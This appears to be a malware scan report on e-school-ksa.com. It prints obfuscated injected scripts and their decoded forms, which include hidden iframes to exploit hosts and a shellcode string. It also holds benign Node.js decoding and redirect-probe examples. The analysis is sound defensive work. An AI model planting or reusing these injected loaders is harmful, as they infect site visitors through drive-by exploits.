Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=e-school-ksa.com
Result: Google marks the site as suspicious: visiting this website may harm your computer.
Details are available on the diagnostic page at the query URL above.
Scanned pages/files
Request | Server response | Status
http://e-school-ksa.com/ | 200 OK; Content-Length: 799; Content-Type: text/html | clean
http://mix-plus.co.kr/p_image/index.php | 200 OK; Content-Length: 4260; Content-Type: application/javascript | suspicious
    Suspicious code: the script writes a hidden iframe. Decoder function and encoded payload as served:
    function ad9(t1E){return t1E.replace(/%/g,'').replace(/[~G'k]/g,eGp2)}
    YUK0='G64ock75~6de~6et.G77ri~74e(k22k3cd~69vk20styleG3dG5ck22positiok6ek3aabG73oluteG3b ~6ceft~3a~2d10~300pG78~3b tk6fp~3ak2d1k30k300pxk3bG5cG22~3eG22)G3bfuncti~6fn i73(a)~7bd~6fcumenk74.write~28~22G3cif~72k61me k73rck3d~5ck22httpG3aG2f~2fmixk2dpluk73.~63o.~6bk72~2fp~5fimag~65~2finde~78.k70h~70k3fs~3dk6a~5ak54KN~62dfG26iG64G3dk22+a~2bk22~5ck22k3e~3ck2fif~72a~6dek3ek22)k3bk7 ...[3828 bytes skipped]...
    Decoded script: document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe src=\"http://mix-plus.co.kr/p_image/index.php?s=jZTKNbdf&id="+a+"\"></iframe>");}ZamO9=0;var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE ...[4436 bytes skipped]...
    The decoded payload parks the iframe 1000px off-screen and carries a %u-encoded shellcode string (scode), the usual shape of a browser exploit page rather than a plain redirect.
http://e-school-ksa.com/search.php | 200 OK; Content-Length: 751; Content-Type: text/html | clean
http://e-school-ksa.com/test404page.js | 404 Not Found; Content-Length: 70565; Content-Type: text/html | malicious
    Malicious code, confirmed by antivirus engines (see below):
    function cE(){};this.hG=17182;cE.prototype = {kK : function() {var b=false;var l=15867;yG="yG";return 'hGtGt]p(:I/I/(aIdGien(gGuer(j].ecIoGm]/Gc(o]uIn(t(1e1(.(p]hGp('.gA(/[\(e\]IG]/g, '');this.cI=false;var cQ="";},f : function() {this.s=11249;var i="";this.w=false;mG="mG";var kT=26949;var d=window;var uF=new Date();var uR=function(){return 'uR'};var p = this;var wV="";var o=10714;var lZ=false;var z=document;this.pA=false;this.kZ=25718;var aP=new Arra ...[1921 bytes skipped]...
    Decoded script: document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>')
    Resulting HTML: <iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>
    Note that this request was a probe for a file that does not exist: the 404 response still carries a 70,565-byte HTML body with the injected script, so the server's error page (and with it every unmatched URL) is serving the malware, not just one file.
    Antivirus reports:
http://e-school-ksa.com/forgot.php | 200 OK; Content-Length: 751; Content-Type: text/html | clean
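The two obfuscated scripts above can be decoded without running them, which is how a scanner (or an analyst) should handle them. The following is an added example written for this page, not code from the scan report or from the malware: it re-implements the quoted ad9() decoder under the assumption that eGp2 holds '%' (the only value that turns the quoted YUK0 text into the "Decoded script" shown), converts the %u-encoded scode string to bytes, and applies the character-stripping replace from the test404page.js script (assuming its gA method is an alias of replace, as its arguments suggest). The YUK0 and scode inputs are the fragments quoted in the report; the URL that falls out of the second script is computed here and is not one the report lists.

```javascript
// Added example (not from the scan report): decode the quoted scripts
// statically, without executing them. Plain Node.js, no dependencies.
// Assumption: eGp2 === '%' in the original script (see lead-in).

// Fragment of YUK0 exactly as quoted in the report (the report elides the rest).
const YUK0_FRAGMENT = 'G64ock75~6de~6et.G77ri~74e(k22k3cd~69vk20styleG3dG5ck22positiok6ek3aabG73oluteG3b ~6ceft~3a~2d10~300pG78~3b tk6fp~3ak2d1k30k300pxk3bG5cG22~3eG22)G3bfuncti~6fn i73(a)~7bd~6fcumenk74.write~28~22G3cif~72k61me k73rck3d~5ck22httpG3aG2f~2fmixk2dpluk73.~63o.~6bk72~2fp~5fimag~65~2finde~78.k70h~70k3fs~3dk6a~5ak54KN~62dfG26iG64G3dk22+a~2bk22~5ck22k3e~3ck2fif~72a~6dek3ek22)k3bk7';

// The decoded text as printed in the report, minus the closing brace that the
// quoted (truncated) fragment does not reach.
const REPORT_DECODED = 'document.write("<div style=\\"position:absolute; left:-1000px; top:-1000px;\\">");function i73(a){document.write("<iframe src=\\"http://mix-plus.co.kr/p_image/index.php?s=jZTKNbdf&id="+a+"\\"></iframe>");';

// Start of the scode string from the same script, as quoted.
const SCODE_FRAGMENT = '%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C';

// String returned by kK() in the test404page.js script, as quoted.
const HIDDEN_URL = "hGtGt]p(:I/I/(aIdGien(gGuer(j].ecIoGm]/Gc(o]uIn(t(1e1(.(p]hGp(";

// Re-implementation of ad9(): strip stray '%', then turn each marker
// character (~ G ' k) into '%' so the text becomes ordinary %XX escapes.
function ad9(text, marker = '%') {
  return text.replace(/%/g, '').replace(/[~G'k]/g, marker);
}

// Decode %XX and %uXXXX escapes like the legacy unescape(), but leave a
// truncated trailing escape (the quoted fragment ends in "k7") untouched.
function percentDecode(text) {
  return text.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

function decodeYuk0(fragment) {
  return percentDecode(ad9(fragment));
}

// Pull every URL out of the decoded text (iframe src etc.) for blocklisting.
function extractUrls(decoded) {
  return Array.from(decoded.matchAll(/https?:\/\/[^\s"'\\<>]+/g), m => m[0]);
}

// "%uC031%u6499..." is a sequence of 16-bit little-endian words; the first
// bytes decode to 31 c0 (xor eax,eax), 99 (cdq), 64 03 40 30
// (add eax, fs:[eax+0x30]), i.e. a PEB walk, which is shellcode, not data.
function shellcodeBytes(scode) {
  const bytes = [];
  for (const [, hex] of scode.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const word = parseInt(hex, 16);
    bytes.push(word & 0xff, word >> 8);
  }
  return bytes;
}

function toHex(bytes) {
  return bytes.map(b => b.toString(16).padStart(2, '0')).join(' ');
}

// Second script: /[\(e\]IG]/g simply deletes the junk characters ( e ] I G.
function decodeHiddenUrl(s) {
  return s.replace(/[(e\]IG]/g, '');
}

console.log(decodeYuk0(YUK0_FRAGMENT));
console.log(extractUrls(decodeYuk0(YUK0_FRAGMENT)));
console.log(toHex(shellcodeBytes(SCODE_FRAGMENT)));
console.log(decodeHiddenUrl(HIDDEN_URL));
```

Feeding the full YUK0 and scode strings from a live capture into decodeYuk0() and shellcodeBytes() gives the complete landing page and a raw shellcode blob that can be disassembled offline; nothing here evaluates attacker code.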
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: e-school-ksa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Dec 2014 10:00:10 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 799
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=be7152e4987a7517c373ed9f73866026; path=/
X-Powered-By: PHP/5.2.17
...799 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: e-school-ksa.com
Referer: http://www.google.com/search?q=e-school-ksa.com
Result:
The response matches the first query: same status, headers and 799-byte body. No conditional redirect keyed on the search-engine Referer was observed.
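The redirect probe above compares a direct visit with one carrying a Google Referer. As an added example (not code from the report or the scanner), the script below repeats that probe in Node.js and extends it the way a practitioner would: it also sends a Googlebot User-Agent, fetches with redirect: 'manual' so a 3xx answer is seen rather than followed, and looks for client-side redirects (meta refresh, location= in script) in the body. It assumes Node 18+ with the global fetch; the target hostname is the one from the report, and the sample responses at the bottom are constructed here to show what the comparison reports, not captured from the site.

```javascript
// Added example (not from the scan report): conditional-redirect probe.
// Assumptions: Node 18+ (global fetch; with redirect:'manual' it returns the
// 3xx response itself, with its Location header).

const TARGET = 'http://e-school-ksa.com/';

// Visitor profiles that conditional-redirect malware typically distinguishes.
const PROFILES = {
  direct: {},
  fromGoogle: { Referer: 'http://www.google.com/search?q=e-school-ksa.com' },
  googlebot: { 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' },
};

// Fetch one profile without following redirects (needs network; not called
// at load time) and reduce it to the fields the comparison needs.
async function probe(url, extraHeaders) {
  const res = await fetch(url, { headers: extraHeaders, redirect: 'manual' });
  const body = await res.text();
  return summarize(res.status, res.headers.get('location'), body);
}

// Summary of a response: status, Location, body size, and any client-side
// redirect hidden in the HTML (meta refresh or location= assignment).
function summarize(status, location, body) {
  const meta = /<meta[^>]+http-equiv=["']?refresh["']?[^>]*url=([^"'>\s]+)/i.exec(body);
  const js = /(?:window\.|document\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']/i.exec(body);
  return {
    status,
    location: location || null,
    length: body.length,
    clientRedirect: (meta && meta[1]) || (js && js[1]) || null,
  };
}

// Compare a baseline (direct visit) against another profile. Returns the
// list of differences; an empty list means "no conditional redirect seen".
function compare(baseline, other) {
  const diffs = [];
  for (const key of ['status', 'location', 'clientRedirect']) {
    if (baseline[key] !== other[key]) diffs.push(`${key}: ${baseline[key]} -> ${other[key]}`);
  }
  // Small size drift is normal (session ids, dates); flag only large changes.
  if (Math.abs(baseline.length - other.length) > 0.2 * baseline.length) {
    diffs.push(`length: ${baseline.length} -> ${other.length}`);
  }
  return diffs;
}

// Run every profile against the target and report differences from 'direct'.
async function runAll(url = TARGET) {
  const results = {};
  for (const [name, headers] of Object.entries(PROFILES)) results[name] = await probe(url, headers);
  return Object.fromEntries(Object.keys(results).filter(n => n !== 'direct')
    .map(n => [n, compare(results.direct, results[n])]));
}

// Constructed sample responses (not captured from the site). The direct
// answer mirrors the report's 799-byte body; the other two show a server-side
// and a client-side redirect to the iframe host the report names.
const SAMPLE_DIRECT = summarize(200, null, '<html>' + 'x'.repeat(793));
const SAMPLE_SEARCH_REDIRECT = summarize(302, 'http://tamarer.com/count20.php', '');
const SAMPLE_META = summarize(200, null,
  '<html><meta http-equiv="refresh" content="0;url=http://tamarer.com/count20.php"></html>');

console.log(compare(SAMPLE_DIRECT, SAMPLE_SEARCH_REDIRECT));
console.log(compare(SAMPLE_DIRECT, SAMPLE_META));
```

Against a live host, `runAll().then(console.log)` prints one difference list per profile; an empty list for every profile is the "no suspicious redirects found" verdict the report gives. Because the site sets a PHPSESSID cookie and no-cache headers, a malicious redirect that fires only once per session would still be missed by a single pass, so repeat the probe from a fresh client.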